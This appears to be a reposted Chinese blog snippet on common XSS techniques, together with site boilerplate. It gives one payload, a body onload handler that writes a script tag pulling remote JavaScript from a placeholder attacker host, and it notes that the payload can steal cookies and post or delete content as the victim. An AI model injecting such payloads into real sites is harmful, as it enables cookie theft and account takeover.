博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
XSS 常见手段
阅读量:6082 次
发布时间:2019-06-20

本文共 215 字,大约阅读时间需要 1 分钟。

       <body οnlοad="document.write('<script src=http://xxx.com/js/main.js></script>')"> 加载一段远程的JS 里面的代码自由发挥可以盗取cookie

        模拟用户发帖 发文章 删除文章 基本上 只要你想到的 多可以做到

 

     

转载于:https://www.cnblogs.com/jackspider/archive/2013/04/28/3049215.html

你可能感兴趣的文章
Ruby on Rails 环境搭建
查看>>
MyBatis学习总结(八)——Mybatis3.x与Spring4.x整合
查看>>
部署System Center App Controller 2012 Service Pack 1 (5)
查看>>
MySQL:日期函数、时间函数总结
查看>>
工作是什么
查看>>
Linux 中cpu通略
查看>>
服务器端创建账户收件箱规则--将邮件复制到指定文件夹中
查看>>
java中简单集合框架(二)
查看>>
函数返回局部变量的一些问题
查看>>
Solaris11性能监控--处理器
查看>>
内存模型
查看>>
如何快速开发网站?
查看>>
tomcat等服务器返回给页面的数字分别表示的意思!
查看>>
我的友情链接
查看>>
个人博客
查看>>
我的友情链接
查看>>
mysql 参数 innodb_flush_log_at_trx_commit
查看>>
Windows Server 2012 远程桌面,你需要具有通过远程桌面服务进行登录的权限
查看>>
Linux流量监控工具 – iftop
查看>>
【VMCloud云平台】SCCM(八)OSD(四)
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-01-04 12:25:54   当前IP: 3.142.135.24   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我